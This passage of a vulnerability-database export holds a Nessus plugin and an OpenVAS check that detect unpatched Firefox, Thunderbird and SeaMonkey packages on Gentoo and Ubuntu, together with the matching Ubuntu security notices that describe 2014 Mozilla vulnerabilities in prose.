"bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1741", "CVE-2013-2566", "CVE-2013-5590", "CVE-2013-5591", "CVE-2013-5592", "CVE-2013-5593", "CVE-2013-5595", "CVE-2013-5596", "CVE-2013-5597", "CVE-2013-5598", "CVE-2013-5599", "CVE-2013-5600", "CVE-2013-5601", "CVE-2013-5602", "CVE-2013-5603", "CVE-2013-5604", "CVE-2013-5605", "CVE-2013-5606", "CVE-2013-5607", "CVE-2013-5609", "CVE-2013-5610", "CVE-2013-5612", "CVE-2013-5613", "CVE-2013-5614", "CVE-2013-5615", "CVE-2013-5616", "CVE-2013-5618", "CVE-2013-5619", "CVE-2013-6671", "CVE-2013-6672", "CVE-2013-6673", "CVE-2014-1477", "CVE-2014-1478", "CVE-2014-1479", "CVE-2014-1480", "CVE-2014-1481", "CVE-2014-1482", "CVE-2014-1483", "CVE-2014-1485", "CVE-2014-1486", "CVE-2014-1487", "CVE-2014-1488", "CVE-2014-1489", "CVE-2014-1490", "CVE-2014-1491", "CVE-2014-1492", "CVE-2014-1493", "CVE-2014-1494", "CVE-2014-1496", "CVE-2014-1497", "CVE-2014-1498", "CVE-2014-1499", "CVE-2014-1500", "CVE-2014-1502", "CVE-2014-1504", "CVE-2014-1505", "CVE-2014-1508", "CVE-2014-1509", "CVE-2014-1510", "CVE-2014-1511", "CVE-2014-1512", "CVE-2014-1513", "CVE-2014-1514", "CVE-2014-1518", "CVE-2014-1519", "CVE-2014-1520", "CVE-2014-1522", "CVE-2014-1523", "CVE-2014-1524", "CVE-2014-1525", "CVE-2014-1526", "CVE-2014-1529", "CVE-2014-1530", "CVE-2014-1531", "CVE-2014-1532", "CVE-2014-1533", "CVE-2014-1534", "CVE-2014-1536", "CVE-2014-1537", "CVE-2014-1538", "CVE-2014-1539", "CVE-2014-1540", "CVE-2014-1541", "CVE-2014-1542", "CVE-2014-1543", "CVE-2014-1544", "CVE-2014-1545", "CVE-2014-1547", "CVE-2014-1548", "CVE-2014-1549", "CVE-2014-1550", "CVE-2014-1551", "CVE-2014-1552", "CVE-2014-1553", "CVE-2014-1554", "CVE-2014-1555", "CVE-2014-1556", "CVE-2014-1557", "CVE-2014-1558", "CVE-2014-1559", "CVE-2014-1560", "CVE-2014-1561", "CVE-2014-1562", "CVE-2014-1563", "CVE-2014-1564", "CVE-2014-1565", "CVE-2014-1566", "CVE-2014-1567", "CVE-2014-1568", "CVE-2014-1574", "CVE-2014-1575", "CVE-2014-1576", "CVE-2014-1577", "CVE-2014-1578", "CVE-2014-1580", "CVE-2014-1581", "CVE-2014-1582", "CVE-2014-1583", "CVE-2014-1584", "CVE-2014-1585", "CVE-2014-1586", "CVE-2014-1587", "CVE-2014-1588", "CVE-2014-1589", "CVE-2014-1590", "CVE-2014-1591", "CVE-2014-1592", "CVE-2014-1593", "CVE-2014-1594", "CVE-2014-5369", "CVE-2014-8631", "CVE-2014-8632", "CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642", "CVE-2015-0817", "CVE-2015-0818", "CVE-2015-0819", "CVE-2015-0820", "CVE-2015-0821", "CVE-2015-0822", "CVE-2015-0823", "CVE-2015-0824", "CVE-2015-0825", "CVE-2015-0826", "CVE-2015-0827", "CVE-2015-0828", "CVE-2015-0829", "CVE-2015-0830", "CVE-2015-0831", "CVE-2015-0832", "CVE-2015-0833", "CVE-2015-0834", "CVE-2015-0835", "CVE-2015-0836"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:firefox", "p-cpe:/a:gentoo:linux:firefox-bin", "p-cpe:/a:gentoo:linux:nspr", "p-cpe:/a:gentoo:linux:seamonkey", "p-cpe:/a:gentoo:linux:seamonkey-bin", "p-cpe:/a:gentoo:linux:thunderbird", "p-cpe:/a:gentoo:linux:thunderbird-bin", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201504-01.NASL", "href": "https://www.tenable.com/plugins/nessus/82632", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201504-01.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82632);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1741\", \"CVE-2013-2566\", \"CVE-2013-5590\", \"CVE-2013-5591\", \"CVE-2013-5592\", \"CVE-2013-5593\", \"CVE-2013-5595\", \"CVE-2013-5596\", \"CVE-2013-5597\", \"CVE-2013-5598\", \"CVE-2013-5599\", \"CVE-2013-5600\", \"CVE-2013-5601\", \"CVE-2013-5602\", \"CVE-2013-5603\", \"CVE-2013-5604\", \"CVE-2013-5605\", \"CVE-2013-5606\", \"CVE-2013-5607\", \"CVE-2013-5609\", \"CVE-2013-5610\", \"CVE-2013-5612\", \"CVE-2013-5613\", \"CVE-2013-5614\", \"CVE-2013-5615\", \"CVE-2013-5616\", \"CVE-2013-5618\", \"CVE-2013-5619\", \"CVE-2013-6671\", \"CVE-2013-6672\", \"CVE-2013-6673\", \"CVE-2014-1477\", \"CVE-2014-1478\", \"CVE-2014-1479\", \"CVE-2014-1480\", \"CVE-2014-1481\", \"CVE-2014-1482\", \"CVE-2014-1483\", \"CVE-2014-1485\", \"CVE-2014-1486\", \"CVE-2014-1487\", \"CVE-2014-1488\", \"CVE-2014-1489\", \"CVE-2014-1490\", \"CVE-2014-1491\", \"CVE-2014-1492\", \"CVE-2014-1493\", \"CVE-2014-1494\", \"CVE-2014-1496\", \"CVE-2014-1497\", \"CVE-2014-1498\", \"CVE-2014-1499\", \"CVE-2014-1500\", \"CVE-2014-1502\", \"CVE-2014-1504\", \"CVE-2014-1505\", \"CVE-2014-1508\", \"CVE-2014-1509\", \"CVE-2014-1510\", \"CVE-2014-1511\", \"CVE-2014-1512\", \"CVE-2014-1513\", \"CVE-2014-1514\", \"CVE-2014-1518\", \"CVE-2014-1519\", \"CVE-2014-1520\", \"CVE-2014-1522\", \"CVE-2014-1523\", \"CVE-2014-1524\", \"CVE-2014-1525\", \"CVE-2014-1526\", \"CVE-2014-1529\", \"CVE-2014-1530\", \"CVE-2014-1531\", \"CVE-2014-1532\", \"CVE-2014-1533\", \"CVE-2014-1534\", \"CVE-2014-1536\", \"CVE-2014-1537\", \"CVE-2014-1538\", \"CVE-2014-1539\", \"CVE-2014-1540\", \"CVE-2014-1541\", \"CVE-2014-1542\", \"CVE-2014-1543\", \"CVE-2014-1544\", \"CVE-2014-1545\", \"CVE-2014-1547\", \"CVE-2014-1548\", \"CVE-2014-1549\", \"CVE-2014-1550\", \"CVE-2014-1551\", \"CVE-2014-1552\", \"CVE-2014-1553\", \"CVE-2014-1554\", \"CVE-2014-1555\", \"CVE-2014-1556\", \"CVE-2014-1557\", \"CVE-2014-1558\", \"CVE-2014-1559\", \"CVE-2014-1560\", \"CVE-2014-1561\", \"CVE-2014-1562\", \"CVE-2014-1563\", \"CVE-2014-1564\", \"CVE-2014-1565\", \"CVE-2014-1566\", \"CVE-2014-1567\", \"CVE-2014-1568\", \"CVE-2014-1574\", \"CVE-2014-1575\", \"CVE-2014-1576\", \"CVE-2014-1577\", \"CVE-2014-1578\", \"CVE-2014-1580\", \"CVE-2014-1581\", \"CVE-2014-1582\", \"CVE-2014-1583\", \"CVE-2014-1584\", \"CVE-2014-1585\", \"CVE-2014-1586\", \"CVE-2014-1587\", \"CVE-2014-1588\", \"CVE-2014-1589\", \"CVE-2014-1590\", \"CVE-2014-1591\", \"CVE-2014-1592\", \"CVE-2014-1593\", \"CVE-2014-1594\", \"CVE-2014-5369\", \"CVE-2014-8631\", \"CVE-2014-8632\", \"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\", \"CVE-2015-0817\", \"CVE-2015-0818\", \"CVE-2015-0819\", \"CVE-2015-0820\", \"CVE-2015-0821\", \"CVE-2015-0822\", \"CVE-2015-0823\", \"CVE-2015-0824\", \"CVE-2015-0825\", \"CVE-2015-0826\", \"CVE-2015-0827\", \"CVE-2015-0828\", \"CVE-2015-0829\", \"CVE-2015-0830\", \"CVE-2015-0831\", \"CVE-2015-0832\", \"CVE-2015-0833\", \"CVE-2015-0834\", \"CVE-2015-0835\", \"CVE-2015-0836\");\n script_xref(name:\"GLSA\", value:\"201504-01\");\n\n script_name(english:\"GLSA-201504-01 : Mozilla Products: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201504-01\n(Mozilla Products: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Firefox, Thunderbird,\n and SeaMonkey. Please review the CVE identifiers referenced below for\n details.\n \nImpact :\n\n A remote attacker could entice a user to view a specially crafted web\n page or email, possibly resulting in execution of arbitrary code or a\n Denial of Service condition. Furthermore, a remote attacker may be able\n to perform Man-in-the-Middle attacks, obtain sensitive information, spoof\n the address bar, conduct clickjacking attacks, bypass security\n restrictions and protection mechanisms, or have other unspecified\n impact.\n \nWorkaround :\n\n There are no known workarounds at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201504-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All firefox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-31.5.3'\n All firefox-bin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-bin-31.5.3'\n All thunderbird users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-client/thunderbird-31.5.0'\n All thunderbird-bin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=mail-client/thunderbird-bin-31.5.0'\n All seamonkey users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-2.33.1'\n All seamonkey-bin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-bin-2.33.1'\n All nspr users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/nspr-4.10.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:thunderbird-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/nspr\", unaffected:make_list(\"ge 4.10.6\"), vulnerable:make_list(\"lt 4.10.6\"))) flag++;\nif (qpkg_check(package:\"mail-client/thunderbird\", unaffected:make_list(\"ge 31.5.0\"), vulnerable:make_list(\"lt 31.5.0\"))) flag++;\nif (qpkg_check(package:\"mail-client/thunderbird-bin\", unaffected:make_list(\"ge 31.5.0\"), vulnerable:make_list(\"lt 31.5.0\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox\", unaffected:make_list(\"ge 31.5.3\"), vulnerable:make_list(\"lt 31.5.3\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox-bin\", unaffected:make_list(\"ge 31.5.3\"), vulnerable:make_list(\"lt 31.5.3\"))) flag++;\nif (qpkg_check(package:\"www-client/seamonkey\", unaffected:make_list(\"ge 2.33.1\"), vulnerable:make_list(\"lt 2.33.1\"))) flag++;\nif (qpkg_check(package:\"www-client/seamonkey-bin\", unaffected:make_list(\"ge 2.33.1\"), vulnerable:make_list(\"lt 2.33.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla Products\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-01-26T13:29:34", "description": "## Releases\n\n * Ubuntu 14.10 \n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * firefox \\- Mozilla Open Source web browser\n\nChristian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse \nRuderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered \nmultiple memory safety issues in Firefox. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthese to cause a denial of service via application crash, or execute \narbitrary code with the privileges of the user invoking Firefox. \n(CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain properties \ncan bypass XrayWrappers in some circumstances. If a user were tricked in \nto opening a specially crafted website, an attacker could potentially \nexploit this to bypass security restrictions. (CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory when rendering \nmalformed bitmap images on a canvas element. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially \nexploit this to steal confidential information. (CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon() \nlack an origin header. If a user were tricked in to opening a specially \ncrafted website, an attacker could potentially exploit this to conduct \ncross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response \ncould inject cookies in to the originally requested domain. If a user \nconnected to a malicious web proxy, an attacker could potentially exploit \nthis to conduct session-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while manipulating \ntimelines. If a user were tricked in to opening a specially crafted \nwebsite, an attacker could potentially exploit this to cause a denial \nof service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit this to cause a denial of service via application \ncrash, or execute arbitrary code with the privileges of the user invoking \nFirefox. (CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to verify if signed \nby a delegated OCSP responder certificate with the id-pkix-ocsp-nocheck \nextension, potentially allowing a user to connect to a site with a revoked \ncertificate. (CVE-2014-8642)\n", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntu", "title": "Firefox vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642"], "modified": "2015-01-14T00:00:00", "id": "USN-2458-1", "href": "https://ubuntu.com/security/notices/USN-2458-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T13:29:32", "description": "## Releases\n\n * Ubuntu 14.10 \n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * ubufox \\- Ubuntu Firefox specific configuration defaults and apt support\n\nUSN-2458-1 fixed vulnerabilities in Firefox. This update provides the \ncorresponding version of Ubufox.\n\nOriginal advisory details:\n\nChristian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse \nRuderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered \nmultiple memory safety issues in Firefox. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthese to cause a denial of service via application crash, or execute \narbitrary code with the privileges of the user invoking Firefox. \n(CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain properties \ncan bypass XrayWrappers in some circumstances. If a user were tricked in \nto opening a specially crafted website, an attacker could potentially \nexploit this to bypass security restrictions. (CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory when rendering \nmalformed bitmap images on a canvas element. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially \nexploit this to steal confidential information. (CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon() \nlack an origin header. If a user were tricked in to opening a specially \ncrafted website, an attacker could potentially exploit this to conduct \ncross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response \ncould inject cookies in to the originally requested domain. If a user \nconnected to a malicious web proxy, an attacker could potentially exploit \nthis to conduct session-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while manipulating \ntimelines. If a user were tricked in to opening a specially crafted \nwebsite, an attacker could potentially exploit this to cause a denial \nof service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit this to cause a denial of service via application \ncrash, or execute arbitrary code with the privileges of the user invoking \nFirefox. (CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to verify if signed \nby a delegated OCSP responder certificate with the id-pkix-ocsp-nocheck \nextension, potentially allowing a user to connect to a site with a revoked \ncertificate. (CVE-2014-8642)\n", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntu", "title": "Ubufox update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642"], "modified": "2015-01-14T00:00:00", "id": "USN-2458-2", "href": "https://ubuntu.com/security/notices/USN-2458-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T13:29:31", "description": "## Releases\n\n * Ubuntu 14.10 \n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * thunderbird \\- Mozilla Open Source mail and newsgroup client\n\nChristian Holler and Patrick McManus discovered multiple memory safety \nissues in Thunderbird. If a user were tricked in to opening a specially \ncrafted message with scripting enabled, an attacker could potentially \nexploit these to cause a denial of service via application crash, or \nexecute arbitrary code with the privileges of the user invoking \nThunderbird. (CVE-2014-8634)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon() \nlack an origin header. If a user were tricked in to opening a specially \ncrafted message with scripting enabled, an attacker could potentially \nexploit this to conduct cross-site request forgery (XSRF) attacks. \n(CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response \ncould inject cookies in to the originally requested domain. If a user \nconnected to a malicious web proxy, an attacker could potentially exploit \nthis to conduct session-fixation attacks. (CVE-2014-8639)\n", "cvss3": {}, "published": "2015-01-19T00:00:00", "type": "ubuntu", "title": "Thunderbird vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2015-01-19T00:00:00", "id": "USN-2460-1", "href": "https://ubuntu.com/security/notices/USN-2460-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:36:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "Ubuntu Update for firefox USN-2458-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842066", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842066", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for firefox USN-2458-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842066\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:59:07 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\",\n \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\",\n \"CVE-2014-8642\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for firefox USN-2458-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Christian Holler, Patrick McManus, Christoph\nDiehl, Gary Kwong, Jesse Ruderman, Byron Campen, Terrence Cole, and Nils Ohlmeier\ndiscovered multiple memory safety issues in Firefox. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthese to cause a denial of service via application crash, or execute\narbitrary code with the privileges of the user invoking Firefox.\n(CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain properties\ncan bypass XrayWrappers in some circumstances. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to bypass security restrictions. (CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory when rendering\nmalformed bitmap images on a canvas element. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit this to steal confidential information. (CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon()\nlack an origin header. If a user were tricked in to opening a specially\ncrafted website, an attacker could potentially exploit this to conduct\ncross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response\ncould inject cookies in to the originally requested domain. If a user\nconnected to a malicious web proxy, an attacker could potentially exploit\nthis to conduct session-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while manipulating\ntimelines. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial\nof service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via application\ncrash, or execute arbitrary code with the privileges of the user invoking\nFirefox. (CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to verify if signed\nby a delegated OCSP responder certificate with the id-pkix-ocsp-nocheck\nextension, potentially allowing a user to connect to a site with a revoked\ncertificate. (CVE-2014-8642)\");\n script_tag(name:\"affected\", value:\"firefox on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2458-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2458-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"35.0+build3-0ubuntu0.14.10.2\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"35.0+build3-0ubuntu0.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n 